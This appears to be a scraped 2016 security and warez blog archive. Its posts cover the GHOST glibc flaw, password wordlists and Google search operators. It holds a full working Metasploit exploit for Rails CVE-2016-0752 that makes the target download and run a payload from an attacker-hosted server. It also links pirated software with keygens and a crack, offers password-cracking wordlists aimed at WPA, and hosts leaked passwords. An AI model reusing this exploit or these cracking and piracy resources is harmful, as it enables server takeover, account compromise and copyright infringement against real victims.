October 2016

31 October 2016

Some Top Network Security Tools (1)

*Click the link below and wait 5 seconds
*By doing this you help FoulsCode.com keep finding new things and sharing them on the blog ;)

>Network Security Tools....


To work around some problems on blogger.com, the posts and files will be hosted on another server, run by xtgem.com

Read More »

RapidWeaver 7.1.7

Name: RapidWeaver 7.1.5
Size: 92.28 MB
Created on: 2016-10-18 23:51:01
Tracker: http://109.235.50.166:2710/announce
Hash: 3a2d7082a450887672b17ab56b15d57235da3098
Files: RapidWeaver 7.1.5/RapidWeaver715.zip (91.81 MB)
       RapidWeaver 7.1.5/cr-paddlekf23.dmg (474.6 kB)
Read More »

27 October 2016

One of The Pirate Bay's founders found guilty of hacking (2014)


2014
Gottfrid Svartholm Warg, one of the three founders of the popular torrent site The Pirate Bay, was accused in a hacking case.



A court in Denmark found the Swede Gottfrid Svartholm Warg (aka "anakata") guilty in a hacking case unrelated to The Pirate Bay; he faces a six-year prison sentence.


According to Wired, the Danish court ruled that Svartholm Warg and his accomplice are guilty of stealing thousands of police ID records, social security records and other sensitive personal data from the computers of the technology giant CSC.


The hacking attack took place in February 2012 from a computer belonging to Warg, while his defense lawyers argued that their client was the victim of a set-up, since another hacker had taken control of his machine and carried out the cyberattacks.


[via]
Read More »

26 October 2016

GHOST: THE LINUX "GHOST" THAT SPOOKED THE SECURITY COMMUNITY



In 2015, researchers at the security firm Qualys, during a routine audit, discovered a vulnerability (a security hole) in a widely used component of many Linux distributions: the glibc library. The flaw is CVE-2015-0235, which they nicknamed Ghost, since it can be triggered via the "gethost" functions on Linux. This security hole can allow an attacker to execute code remotely on a computer running Linux. In plain terms, the Ghost vulnerability (CVE-2015-0235) can, theoretically, let an attacker gain remote access to your device (and of course to your company's server, for example) and take control of the system.

The vulnerability lives in the GNU C Library, known as glibc: the GNU project's implementation of the standard C library. It is an open-source collection of code that powers thousands of applications and most Linux distributions, including those shipped on routers and other types of hardware.
Simply put, without glibc, a Linux system could not function.

At the time, many companies rushed to publish announcements on whether their products were affected, stressing that they would promptly update any affected software (that is, whatever software of theirs runs on the Linux platform and includes glibc), and noting that proof-of-concept code already existed, with attacks exploiting the vulnerability said to be imminent.

Qualys, which discovered CVE-2015-0235 during a routine code audit, found that the __nss_hostname_digits_dots() function of the GNU C Library makes the library vulnerable to a buffer overflow:


During a code audit performed internally at Qualys, we discovered a buffer overflow in the __nss_hostname_digits_dots() function of the GNU C Library (glibc). This bug is reachable both locally and remotely via the gethostbyname*() functions, so we decided to analyze it -- and its impact -- thoroughly, and named this vulnerability "GHOST".




Fix: upgrade to glibc-2.18
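Since the advisory gives a clean version window (introduced in glibc-2.2, fixed in glibc-2.18), a rough exposure check can be sketched in a few lines. This is our own illustrative helper, not Qualys tooling, and because distributions backport patches, a version string alone is only a heuristic:

```python
# Naive GHOST (CVE-2015-0235) exposure check based purely on the glibc
# version number: vulnerable releases are >= 2.2 and < 2.18.
# NOTE: distros backport fixes, so treat this as a heuristic only.
def ghost_vulnerable(version: str) -> bool:
    major, minor = (int(x) for x in version.split(".")[:2])
    return (2, 2) <= (major, minor) < (2, 18)

# On a glibc system the live version can be read via ctypes:
#   import ctypes
#   libc = ctypes.CDLL("libc.so.6")
#   libc.gnu_get_libc_version.restype = ctypes.c_char_p
#   version = libc.gnu_get_libc_version().decode()
print(ghost_vulnerable("2.17"))  # last release before the fix
print(ghost_vulnerable("2.18"))  # first fixed release
```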

If you run stable, long-term-support distributions, take note: the vulnerability was indeed fixed, but it was never flagged as a security threat, because at the time it was treated as an ordinary bug rather than a security hole:


The first vulnerable version of the GNU C Library is glibc-2.2, released on November 10, 2000.

- We identified a number of factors that mitigate the impact of this bug.

In particular, we discovered that it was fixed on May 21, 2013 (between the releases of glibc-2.17 and glibc-2.18).

Unfortunately, it was not recognized as a security threat; as a result, most stable and long-term-support distributions were left exposed (and still are):

Debian 7 (wheezy), Red Hat Enterprise Linux 6 & 7, CentOS 6 & 7, Ubuntu 12.04, for example.


Of course, we pass all of this along with due caution.

>>> The security firm's advisory on the vulnerability.

via: osarena.net
Read More »

14 October 2016

Ruby on Rails Dynamic Render File Upload Remote Code Execution


This Metasploit module exploits a remote code execution vulnerability in the explicit render method when leveraging user parameters. It has been tested across multiple versions of Ruby on Rails. The technique used by this module requires the specified endpoint to be using dynamic render paths. Also, the vulnerable target will need a POST endpoint for the TempFile upload; this can literally be any endpoint. This module does not use the log inclusion method of exploitation, due to it not being universal enough. Instead, a new code injection technique was found and used whereby an attacker can upload temporary image files against any POST endpoint and use them for the inclusion attack. Finally, you only get one shot at this if you are testing with the built-in Rails server, so use caution.

MD5 | 330df82eae0981c2ca7cc8777a63a53c


require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Ruby on Rails Dynamic Render File Upload Remote Code Execution',
      'Description' => %q{
        This module exploits a remote code execution vulnerability in the
        explicit render method when leveraging user parameters. This module
        has been tested across multiple versions of Ruby on Rails. The
        technique used by this module requires the specified endpoint to be
        using dynamic render paths, such as the following example:

          def show
            render params[:id]
          end

        Also, the vulnerable target will need a POST endpoint for the
        TempFile upload, this can literally be any endpoint. This module
        doesnt use the log inclusion method of exploitation due to it not
        being universal enough. Instead, a new code injection technique was
        found and used whereby an attacker can upload temporary image files
        against any POST endpoint and use them for the inclusion attack.
        Finally, you only get one shot at this if you are testing with the
        builtin rails server, use caution.
      },
      'Author'      => [
        'mr_me ',                      # necromanced old bug & discovered new rce vector
        'John Poulin (forced-request)' # original render bug finder
      ],
      'References'  => [
        [ 'CVE', '2016-0752' ],
        [ 'URL', 'https://groups.google.com/forum/#!topic/rubyonrails-security/335P1DcLG00' ], # rails patch
        [ 'URL', 'https://nvisium.com/blog/2016/01/26/rails-dynamic-render-to-rce-cve-2016-0752/' ], # John Poulin CVE-2016-0752 patched in 5.0.0.beta1.1 - January 25, 2016
        [ 'URL', 'https://gist.github.com/forced-request/5158759a6418e6376afb' ] # John's original exploit
      ],
      'License'     => MSF_LICENSE,
      'Platform'    => ['linux', 'bsd'],
      'Arch'        => ARCH_X86,
      'Payload'     => { 'DisableNops' => true },
      'Privileged'  => false,
      'Targets'     => [
        [ 'Ruby on Rails 4.0.8 July 2, 2014', {} ] # Other versions are also affected
      ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Oct 16 2016'))

    register_options(
      [
        Opt::RPORT(3000),
        OptString.new('URIPATH', [ true, 'The path to the vulnerable route', "/users" ]),
        OptPort.new('SRVPORT', [ true, 'The daemon port to listen on', 1337 ]),
      ], self.class)
  end

  def check
    # this is the check for the dev environment
    res = send_request_cgi({
      'uri'    => normalize_uri(datastore['URIPATH'], "%2f"),
      'method' => 'GET',
    }, 60)

    # if the page controller is dynamically rendering, its for sure vuln
    if res and res.body =~ /render params/
      return CheckCode::Vulnerable
    end

    # this is the check for the prod environment
    res = send_request_cgi({
      'uri'    => normalize_uri(datastore['URIPATH'], "%2fproc%2fself%2fcomm"),
      'method' => 'GET',
    }, 60)

    # if we can read files, its likley we can execute code
    if res and res.body =~ /ruby/
      return CheckCode::Appears
    end
    return CheckCode::Safe
  end

  def on_request_uri(cli, request)
    if (not @pl)
      print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!")
      return
    end
    print_status("#{rhost}:#{rport} - Sending the payload to the server...")
    @elf_sent = true
    send_response(cli, @pl)
  end

  def send_payload
    @bd = rand_text_alpha(8+rand(8))
    fn = rand_text_alpha(8+rand(8))
    un = rand_text_alpha(8+rand(8))
    pn = rand_text_alpha(8+rand(8))
    register_file_for_cleanup("/tmp/#{@bd}")
    cmd = "wget #{@service_url} -O /tmp/#{@bd};"
    cmd << "chmod 755 /tmp/#{@bd};"
    cmd << "/tmp/#{@bd}"
    pay = "<%=`#{cmd}`%>"
    print_status("uploading image...")
    data = Rex::MIME::Message.new
    data.add_part(pay, nil, nil, 'form-data; name="#{un}"; filename="#{fn}.gif"')
    res = send_request_cgi({
      'method' => 'POST',
      'cookie' => @cookie,
      'uri'    => normalize_uri(datastore['URIPATH'], pn),
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => data.to_s
    })
    if res and res.code == 422 and res.body =~ /Tempfile:\/(.*)>/
      @path = "#{$1}" if res.body =~ /Tempfile:\/(.*)>/
      return true
    else
      # this is where we pull the log file
      if leak_log
        return true
      end
    end
    return false
  end

  def leak_log
    # path to the log /proc/self/fd/7
    # this bypasses the extension check
    res = send_request_cgi({
      'uri'    => normalize_uri(datastore['URIPATH'], "proc%2fself%2ffd%2f7"),
      'method' => 'GET',
    }, 60)

    if res and res.code == 200 and res.body =~ /Tempfile:\/(.*)>, @original_filename=/
      @path = "#{$1}" if res.body =~ /Tempfile:\/(.*)>, @original_filename=/
      return true
    end
    return false
  end

  def start_http_server
    @pl = generate_payload_exe
    @elf_sent = false
    downfile = rand_text_alpha(8+rand(8))
    resource_uri = '/' + downfile
    if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
      srv_host = datastore['URIHOST'] || Rex::Socket.source_address(rhost)
    else
      srv_host = datastore['SRVHOST']
    end

    # do not use SSL for the attacking web server
    if datastore['SSL']
      ssl_restore = true
      datastore['SSL'] = false
    end

    @service_url = "http://#{srv_host}:#{datastore['SRVPORT']}#{resource_uri}"
    service_url_payload = srv_host + resource_uri
    print_status("#{rhost}:#{rport} - Starting up our web service on #{@service_url} ...")
    start_service({'Uri' => {
      'Proc' => Proc.new { |cli, req| on_request_uri(cli, req) },
      'Path' => resource_uri
    }})
    datastore['SSL'] = true if ssl_restore
    connect
  end

  def render_tmpfile
    @path.gsub!(/\//, '%2f')
    res = send_request_cgi({
      'uri'    => normalize_uri(datastore['URIPATH'], @path),
      'method' => 'GET',
    }, 1)
  end

  def exploit
    print_status("Sending initial request to detect exploitability")
    start_http_server
    if send_payload
      print_good("injected payload")
      render_tmpfile
      # we need to delay, for the stager
      select(nil, nil, nil, 5)
    end
  end
end
Read More »

Dictionaries + Wordlists


Brief

Other than a mass of download links, this post also contains pretty pictures and confusing numbers showing the breakdown of statistics for 17 wordlists. These wordlists, whose original source(s) can be found online, have been 'analysed', 'cleaned' and then 'sorted'. For example:
Merged each 'collection' into one file (minus the 'readmes' files)
Removed leading & trailing spaces & tabs
Converted all 'new lines' to 'Unix' format
Removed non-printable characters
Removed HTML tags (Complete and common incomplete tags)
Removed (common domains) email addresses
Removed duplicate entries
Calculated how much of each would be usable for 'cracking WPA' (entries between 8-63 characters)
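The cleaning steps above can be sketched in Python. This is a simplified illustration of the process (the actual work was done with the shell one-liners shown further down this post); the function name and the tiny email-domain list are ours:

```python
# Sketch of the wordlist cleaning pipeline: normalise newlines, strip
# non-printables, remove HTML tags and common-domain emails, trim
# whitespace, dedupe, then filter to WPA-length (8-63 char) entries.
import re
import string

PRINTABLE = set(string.printable) - set("\x0b\x0c")

def clean_wordlist(lines):
    seen = set()
    out = []
    for line in lines:
        line = line.replace("\r\n", "\n").replace("\r", "\n").strip("\n")
        line = "".join(c for c in line if c in PRINTABLE)           # non-printables
        line = re.sub(r"<[^>]*>", "", line)                          # HTML tags
        line = re.sub(r"^\S+@\S+\.(com|net|org|edu):?", "", line)    # common-domain emails
        line = line.strip(" \t")                                     # leading/trailing space & tabs
        if line and line not in seen:                                # duplicates
            seen.add(line)
            out.append(line)
    return out

words = clean_wordlist(["  secret \r\n", "<b>secret</b>", "user@company.com:password1"])
wpa = [w for w in words if 8 <= len(w) <= 63]   # usable for 'cracking WPA'
print(words, wpa)
```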

It may not sound like a lot - but after the process, the size of most wordlists is considerably smaller!
Method

Before getting to the results: each wordlist has been sorted differently, rather than just 'case sensitive A-Z'.

Each wordlist was:
Split into two parts - 'single or two words' and 'multiple spaces'.
Sorted by the number of times each word was duplicated - so the higher up the list, the more common the word is.
Sorted again, case-insensitively, A-Z.
Joined back together - single or two words at the start.
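The steps above can be sketched as follows, under the assumption that 'single or two words' means at most one space: duplicates are counted, the most-repeated words float to the top, ties break case-insensitively A-Z, and multi-space entries go last:

```python
# Sketch of the sort order described above: frequency first (descending),
# then case-insensitive A-Z, with multi-space entries moved to the end.
from collections import Counter

def sort_wordlist(words):
    freq = Counter(words)
    unique = list(freq)                                   # first-seen order, deduped
    one_or_two = [w for w in unique if w.count(" ") <= 1]  # single or two words
    multi      = [w for w in unique if w.count(" ") > 1]   # multiple spaces
    key = lambda w: (-freq[w], w.lower())
    return sorted(one_or_two, key=key) + sorted(multi, key=key)

print(sort_wordlist(["beta", "alpha", "beta", "a b c"]))
# "beta" is seen twice so it leads; the multi-space entry goes last
```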

The reason for splitting into two parts is that 'most' passwords are either one or two words (containing one space). Words with multiple spaces are mainly due to 'mistakes' in when/how the wordlists were created. So having them lower down should increase the speed at which the password is discovered, without losing any possibilities.

The justification for sorting by duplicate count is that the more common the word, the higher the chance it would be used! If you don't like this method, you can sort it back to case sensitive A-Z yourself; however, it can't be sorted back to exactly how it was, because the lists (hopefully) no longer contain any duplicates!

Removing HTML tags and/or email addresses doesn't mean the process wasn't effective. If a word contained some HTML tags and was still unique after removing them, the line count wouldn't change, the wordlist would improve, and the entry could still be unique. It is also worth mentioning that, being a blanket 'search & replace', it COULD have removed a few false positives; the amount removed is believed to be worth it against the estimated loss. For example, instead of having the three entries below, it is more worthwhile to keep just the two passwords:
user1@company.com:password1
user2@company.com:password1
user3@company.com:password2

Download links for each 'cleaned' collection are in the table below, along with the results found and graphs. '17-in-1' is the combination of the results produced from each of the 17 collections. The extra addition afterwards (18-in-1) is a mixture of random wordlists (Languages (AIO), Random & WPA/WPA2) which I have accumulated. You can view & download them here (along with all the others!). '18-in-1 [WPA]' is a 'smaller' version of 18-in-1, with JUST words between 8-63 characters.
Source

UPDATE: Will re-upload soon



Collection Name (Original Source) | Lines & Size (Extracted / Compressed) | Download | MD5
Collection of Wordlist v.2 374806023 (3.9GB / 539MB) Part 1, Part 2, Part 3 5510122c3c27c97b2243208ec580cc67
HuegelCDC 53059218 (508MB / 64MB) Part 1 52f42b3088fcb508ddbe4427e8015be6
Naxxatoe-Dict-Total-New 4239459985 (25GB / 1.1GB) Part 1, Part 2, Part 3 Part 4, Part 5, Part 6 e52d0651d742a7d8eafdb66283b75e12
Purehates Word list 165824917 (1.7GB / 250MB) Part 1, Part 2 c5dd37f2b3993df0b56a0d0eba5fd948
theargonlistver1 4865840 (52MB / 15MB) Part 1 b156e46eab541ee296d1be3206b0918d
theargonlistver2 46428068 (297MB / 32MB) Part 1 41227b1698770ea95e96b15fd9b7fc6a
theargonlistver2-v2 (word.lst.s.u.john.s.u.200) 244752784 (2.2GB / 219MB) Part 1, Part 2 36f47a35dd0d995c8703199a09513259
WordList Collection 472603140 (4.9GB / 1.4GB) Part 1, Part 2, Part 3, Part 4, Part 5, Part 6, Part 7 a76e7b1d80ae47909b5a0baa4c414194
wordlist-final 8287890 (80MB / 19MB) Part 1 db2de90185af33b017b00424aaf85f77
wordlists-sorted 65581967 (687MB / 168MB) Part 1 2537a72f729e660d87b4765621b8c4bc
wpalist 37520637 (422MB / 66MB) Part 1 9cb032c0efc41f2b377147bf53745fd5
WPA-PSK WORDLIST (40 MB) 2829412 (32MB / 8.7MB) Part 1 de45bf21e85b7175cabb6e41c509a787
WPA-PSK WORDLIST 2 (107 MB) 5062241 (55MB / 15MB) Part 1 684c5552b307b4c9e4f6eed86208c991
WPA-PSK WORDLIST 3 Final (13 GB) 611419293 (6.8GB / 1.4GB) Part 1, Part 2, Part 3, Part 4, Part 5, Part 6, Part 7 58747c6dea104a48016a1fbc97942c14
-=Xploitz=- Vol 1 - PASSWORD DVD 100944487 (906MB / 109MB) Part 1 38eae1054a07cb894ca5587b279e39e4
-=Xploitz=- Vol 2 - Master Password Collection 87565344 (1.1GB / 158MB) Part 1 53f0546151fc2c74c8f19a54f9c17099
-=Xploitz Pirates=- Masters Password Collection #1! -- Optimized 79523622 (937MB / 134MB) Part 1 6dd2c32321161739563d0e428f5362f4
17-in-1 5341231112 (37GB / 4.5GB) Part 1 - Part 24 d1f8abd4cb16d2280efb34998d41f604
18-in-1 5343814622 (37GB / 4.5GB) Part 1 - Part 24 aee6d1a230fdad3b514a02eb07a95226
18-in-1 [WPA Edition] 1130701596 (12.6GB / 2.9GB) Part 1 - Part 15 425d47c549232b62dbb0e71b8394e9d9

Results
Table 1 - Raw Data


Table 2 - Calculated Differences


Table 3 - Summary


Graph 1 - Number of lines in a collection


Graph 2 - Percentage of unique words in a collection


Graph 3 - Number of lines removed during cleaning


Graph 4 - Percentage of content removed


Graph 5 - Percentage of words between 8-63 characters (WPA)

Red means it is MEANT for WPA

A few notes about the results:
In the tables - the 'Purehates' wordlist is corrupt and, towards the end, contains 'rubbish' (non-printable characters). That is why it is highlighted red: it isn't complete, and I was unable to find the original.
Table 3, which summarizes the results, shows that 57% of the 17 collections is unique. Therefore 43% of it would be wasted on duplication if it were tested - that's a large amount of extra, unneeded attempts!
In graph 2 - only one collection was 100% 'unique', which means most of the collections' sizes have been reduced.
In graph 5 - which shows how effective each wordlist would be towards cracking WPA - the four wordlists which were 'meant' for WPA are in red.

In a few of the 'readme' files (which weren't included when merging), several claimed to have had duplicates removed. However, unless the list is sorted, the bash program 'uniq' won't remove the duplicates. By piping the output of sort into uniq, the duplicates are then removed. However, using sort takes time, and with a bit of 'awk fu', awk '!x[$0]++' [filename] removes the need to sort.

For example:
Value                                      | uniq                                 | sort / uniq or awk '!x[$0]++'
word1,word2,word2,word3                    | word1,word2,word3                    | word1,word2,word3
word1,word2,word2,word3,word1              | word1,word2,word3,word1              | word1,word2,word3
word1,word2,word1,word1,word2,word3,word1  | word1,word2,word1,word2,word3,word1  | word1,word2,word3
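The awk one-liner keeps the first occurrence of every line without any sorting; a Python equivalent of the same trick:

```python
# Order-preserving dedupe, the Python equivalent of awk '!x[$0]++':
# set.add() returns None (falsy), so unseen lines are kept and recorded
# in one expression, and no pre-sort is needed, unlike plain uniq.
def dedupe(lines):
    seen = set()
    return [x for x in lines if not (x in seen or seen.add(x))]

print(dedupe(["word1", "word2", "word1", "word1", "word2", "word3", "word1"]))
```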

Commands

The commands used were:
Step By Step


# Merging
rm -vf CREADME CHANGELOG* readme* README* stage*
echo "Number of files:" `find . -type f | wc -l`
cat * > /tmp/aio-"${PWD##*/}".lst && rm * && mv /tmp/aio-"${PWD##*/}".lst ./ && wc -l aio-"${PWD##*/}".lst
file -k aio-"${PWD##*/}".lst

# Uniq Lines
cat aio-"${PWD##*/}".lst | sort -b -f -i -T "$(pwd)/" | uniq > stage1 && wc -l stage1

# "Clean" Lines
tr '\r' '\n' < stage1 > stage2-tmp && rm stage1 && tr '\0' ' ' < stage2-tmp > stage2-tmp1 && rm stage2-tmp && tr -cd '\11\12\15\40-\176' < stage2-tmp1 > stage2-tmp && rm stage2-tmp1
cat stage2-tmp | sed "s/  */ /gI;s/^[ \t]*//;s/[ \t]*$//" | sort -b -f -i -T "$(pwd)/" | uniq > stage2 && rm stage2-* && wc -l stage2

# Remove HTML Tags
htmlTags="a|b|big|blockquote|body|br|center|code|del|div|em|font|h[1-9]|head|hr|html|i|img|ins|item|li|ol|option|p|pre|s|small|span|strong|sub|sup|table|td|th|title|tr|tt|u|ul"
cat stage2 | sed -r "s/<[^>]*>//g;s/^\w.*=\"\w.*\">//;s/^($htmlTags)>//I;s/<\/*($htmlTags)$//I;s/&amp;*/\&/gI;s/&quot;/\"/gI;s/&#39;/'/gI;s/&apos;/'/gI;s/&lt;/</gI;s/&gt;/>/gI" > stage3 && wc -l stage3 && rm stage2

# Remove Email addresses
cat stage3 | sed -r "s/\w.*\@.*\.(ac|ag|as|at|au|be|bg|bill|bm|bs|c|ca|cc|ch|cm|co|com|cs|de|dk|edu|es|fi|fm|fr|gov|gr|hr|hu|ic|ie|il|info|it|jo|jp|kr|lk|lu|lv|me|mil|mu|net|nil|nl|no|nt|org|pk|pl|pt|ru|se|si|tc|tk|to|tv|tw|uk|us|ws|yu):*//gI" | sort -b -f -i -T "$(pwd)/" | uniq > stage4 && wc -l stage4 && rm stage3

# Misc
pw-inspector -i aio-"${PWD##*/}".lst -o aio-"${PWD##*/}"-wpa.lst -m 8 -M 63 ; wc -l aio-"${PWD##*/}"-wpa.lst && rm aio-"${PWD##*/}"-wpa.lst
pw-inspector -i stage4 -o stage5 -m 8 -M 63 ; wc -l stage5
7za a -t7z -mx9 -v200m stage4.7z stage4
du -sh *

AIO

rm -f stage*
echo "Number of files:" `find . -type f | wc -l`
cat * > /tmp/aio-"${PWD##*/}".lst && rm * && mv /tmp/aio-"${PWD##*/}".lst ./
tr '\r' '\n' < aio-"${PWD##*/}".lst > stage1-tmp && tr '\0' ' ' < stage1-tmp > stage1-tmp1 && tr -cd '\11\12\15\40-\176' < stage1-tmp1 > stage1-tmp && mv stage1-tmp stage1 && rm stage1-* # End Of Line/New Line & "printable"
htmlTags="a|b|big|blockquote|body|br|center|code|del|div|em|font|h[1-9]|head|hr|html|i|img|ins|item|li|ol|option|p|pre|s|small|span|strong|sub|sup|table|td|th|title|tr|tt|u|ul"
cat stage1 | sed -r "s/  */ /gI;s/^[ \t]*//;s/[ \t]*$//;s/<[^>]*>//g;s/^\w.*=\"\w.*\">//;s/^($htmlTags)>//I;s/<\/*($htmlTags)$//I;s/&amp;*/\&/gI;s/&quot;/\"/gI;s/&#39;/'/gI;s/&apos;/'/gI;s/&lt;/</gI;s/&gt;/>/gI" > stage2 && rm stage1
sort -b -f -i -T "$(pwd)/" stage2 > stage3 && rm stage2
grep -v " * .* " stage3 > stage3.1
grep " * .* " stage3 > stage3.4
#grep -v " * .* \| " stage3 > stage3.1            # All one or two words
#grep " * .* " stage3 | grep -v "  " > stage3.2   # All 3+ words
#grep " * .* " stage3 | grep "  " > stage3.3      # All multiple spacing words
rm stage3
for fileIn in stage3.*; do
  # Place one or two words at the start
  cat "$fileIn" | uniq -c -d > stage3.0                                      # Find dups (else uniq could miss a few values if the list wasn't in order e.g. test1 test2 test3, test2, test4)
  sort -b -f -i -T "$(pwd)/" -k1,1r -k2 stage3.0 > stage3 && rm stage3.0     # Sort by amount of dup times (9-0) then by the value (A-Z)
  sed 's/^ *//;s/^[0-9]* //' stage3 >> "${PWD##*/}"-clean.lst && rm stage3   # Remove "formatting" that uniq adds (lots of spaces at the start)
  cat "$fileIn" | uniq -u >> "${PWD##*/}"-clean.lst                          # Add the unique values at the end (A-Z)
  rm "$fileIn"
done
rm -f stage* #aio-"${PWD##*/}".lst
#7za a -t7z -mx9 -v200m "${PWD##*/}".7z "${PWD##*/}".lst
wc -l "${PWD##*/}"-clean.lst
md5sum "${PWD##*/}"-clean.lst


If you're wanting to try this all out for your self, you can find some more wordlists here:
http://www.skullsecurity.org/wiki/index.php/Passwords
http://trac.kismac-ng.org/wiki/wordlists
http://hashcrack.blogspot.com/p/wordlist-downloads_29.html
http://packetstormsecurity.org/Crackers/wordlists/
http://0x80.org/wordlist/
http://dictionary-thesaurus.com/wordlists.html
http://www.outpost9.com/files/WordLists.html
http://www.openwall.com/passwords/wordlists/
http://dictionary-thesaurus.com/Wordlists.html
http://en.wikipedia.org/wiki/Wikipedia_database#Where_do_I_get... & http://blog.sebastien.raveau.name/2009/03/cracking-passwords-with-wikipedia.html
http://www.isdpodcast.com/resources/62k-common-passwords/
Moving forwards

As mentioned at the start, whilst having gigabytes worth of wordlists may be good and all... having a personalised/specific/targeted wordlist is great. PaulDotCom (great show by the way), did just that a while back.

As the password has to be in the wordlist, if your wordlist doesn't contain the correct password you could try crunch (or L517 for Windows) to generate your own. For a few good tutorials on how to use crunch, check here and here (I highly recommend ADayWithTape's blog).

As waiting for a mass of words to be tried takes some time, it could be sped up by 'pre-hashing'. For example, this works against WPA-PSK; however, WPA-PSK is 'salted' (using the SSID as the salt). This means that each pre-hashed table is only valid for THAT salt/SSID. This isn't going to turn into another 'how to crack WPA', as it's already been done; it was just mentioned because this and this could help speed up the process.
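To make the salting point concrete: WPA/WPA2-PSK derives its pairwise master key with PBKDF2-HMAC-SHA1 over 4096 iterations, using the SSID as the salt, which is exactly why a precomputed table only works for that one SSID. A standard-library sketch:

```python
# WPA/WPA2-PSK pairwise master key (PMK) derivation:
# PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 iterations, 32 bytes).
# Changing the SSID changes the salt, invalidating any precomputed table.
import hashlib

def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

# The IEEE 802.11i test vector uses passphrase "password" with SSID "IEEE"
print(wpa_pmk("password", "IEEE").hex())
```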

Instead of brute forcing your way in, by 'playing it smart' it could be possible to generate/discover the password instead. This works if the algorithm has a weakness (for example here) or if the system is poor (for example here). However, finding a weakness might take longer than trying a wordlist (or three!).

When compiling all of this, I came across this list of what most 'professional password guessers' know:
There is a 50 percent chance that a user's password will contain one or more vowels.
If it contains a number, it will usually be a 1 or 2, and it will be at the end.
If it contains a capital letter, it will be at the beginning, followed by a vowel.
The average person has a working vocabulary of 50,000 to 150,000 words, and they are likely to be used in the password.
Women are famous for using personal names in their passwords, and men opt for their hobbies.
"Tigergolf" is not as unique as CEOs think.
Even if you use a symbol, an attacker knows which are most likely to appear: ~, !, @, #, $, %, &, and ?.
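Those heuristics are easy to turn into a toy scorer (a hypothetical helper, not a real strength meter): the more of the patterns above a password matches, the more predictable it is to a guesser.

```python
# Toy "predictability" score built from the guesser heuristics above.
# Each matched pattern (vowel present, trailing 1/2, leading capital+vowel,
# common symbol) adds one point; higher means more guessable.
import re

def predictability(pw: str) -> int:
    score = 0
    score += any(v in pw.lower() for v in "aeiou")   # contains a vowel
    score += bool(re.search(r"[12]$", pw))           # 1 or 2 at the end
    score += bool(re.match(r"[A-Z][aeiou]", pw))     # capital first, vowel next
    score += any(s in pw for s in "~!@#$%&?")        # the usual symbols
    return score

print(predictability("Tigergolf1"))  # matches three of the four patterns
```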

When your password has to be 'at least 8 characters long and include at least one capital', it doesn't mean: 'MickeyMinniePlutoHueyLouieDeweyDonaldGoofyLondon'. And for the people that made it this far down, here is a 'riddle' on the subject of passwords.
Read More »

FxFactory Pro 6.0.0.5066

Name: FxFactory_Pro_v6.0.0.5066.zip
Size: 138.9 MB
Created on: 2016-10-09 17:44:32
Hash: e56a7f7939315428c22940b2196f967392c9b02f
Files: FxFactory_Pro_v6.0.0.5066.zip (138.9 MB)











Description

Name: FxFactory for Mac
Version: 6.0.0
Language: English
Release Date: 23 Sep 2016
Mac Platform: Intel
OS version: OS X 10.11 or later
Processor type(s) & speed: 64-bit
Requires one of the following:
・Apple Final Cut Pro X 10.2
・Motion 5.2
・Adobe After Effects CC, CC 2014, CC 2015, or CC 2015.3
・Adobe Premiere Pro CC, CC 2014, CC 2015, or CC 2015.3
Includes: Keygen and Serials
Web Site: https://fxfactory.com/

Overview: FxFactory is a revolutionary visual effects package which powers the largest collection of plug-ins for Final Cut Pro, Motion, After Effects, and Premiere Pro. The program offers an all-in-one video package expandable to over 170 plug-ins for video stylization, color correction, animation frames, typing, stereoscopic 3D and titling. The new release also includes updates to Photo Montage, Motype, Calls, Cleaner, Split Animator and FxFactory Pro.

What's New in Version 6.0.0:
・Designed and optimized for macOS 10.12 Sierra
/DOWNLOAD/
Read More »

11 October 2016

Google Commands


Tips

Using Google to find what type of technologies a company is using:

site:<companydomain> careers
site:<companydomain> jobs
site:<companydomain> openings







site:<site>
link:<site>
related:<site>
intitle:<text>
inurl:<text>
filetype:<type>
'.' = wildcard
'..' = range ('2007..2009')
'~' = synonyms
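A trivial sketch that assembles the recruiting dorks above for a target domain (the helper name is ours):

```python
# Build the "what tech does this company use" Google queries shown above
# for a given domain; paste each result into a search box.
def dorks(domain: str):
    return [f"site:{domain} {kw}" for kw in ("careers", "jobs", "openings")]

print(dorks("example.com"))
```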
Read More »

Password dictionaries, Leaked


Password dictionaries

These are dictionaries that come with tools/worms/etc, designed for cracking passwords. As far as I know, I'm not breaking any licensing agreements by mirroring them with credit; if you don't want me to host one of these files, let me know and I'll remove it.
Name Compressed Uncompressed Notes
John the Ripper john.txt.bz2 (10,934 bytes) n/a Simple, extremely good, designed to be modified
Cain & Abel cain.txt.bz2 (1,069,968 bytes) n/a Fairly comprehensive, not ordered
Conficker worm conficker.txt.bz2 (1411 bytes) n/a Used by conficker worm to spread -- low quality
500 worst passwords 500-worst-passwords.txt.bz2 (1868 bytes) n/a
370 Banned Twitter passwords twitter-banned.txt.bz2 (1509 bytes) n/a

Leaked passwords

Passwords that were leaked or stolen from sites. I'm hosting them because it seems like nobody else does (hopefully it isn't because hosting them is illegal :)). Naturally, I'm not the one who stole these; I simply found them online and removed any names/email addresses/etc. (I don't see any reason to supply usernames -- if you do have a good reason, email me (ron-at-skullsecurity.net) and I'll see if I have them.)

The best use of these is to generate or test password lists.
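As a minimal sketch of the "test password lists" use case, the following reads one of the bz2-compressed wordlists above and checks each candidate against a known hash (the wordlist path and target hash in any real run are yours to supply; MD5 is used here only because several of the lists above were cracked from MD5 dumps):

```python
import bz2
import hashlib

def find_password(wordlist_path, target_md5):
    """Return the first word in a bz2-compressed wordlist whose MD5
    matches target_md5, or None if no word matches."""
    with bz2.open(wordlist_path, "rt", encoding="utf-8", errors="ignore") as f:
        for line in f:
            candidate = line.rstrip("\n")
            if hashlib.md5(candidate.encode("utf-8")).hexdigest() == target_md5:
                return candidate
    return None
```

For example, `find_password("rockyou.txt.bz2", some_hash)` would walk the Rockyou list in its compressed form, so the file never needs to be unpacked on disk.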

Note: The dates are approximate.
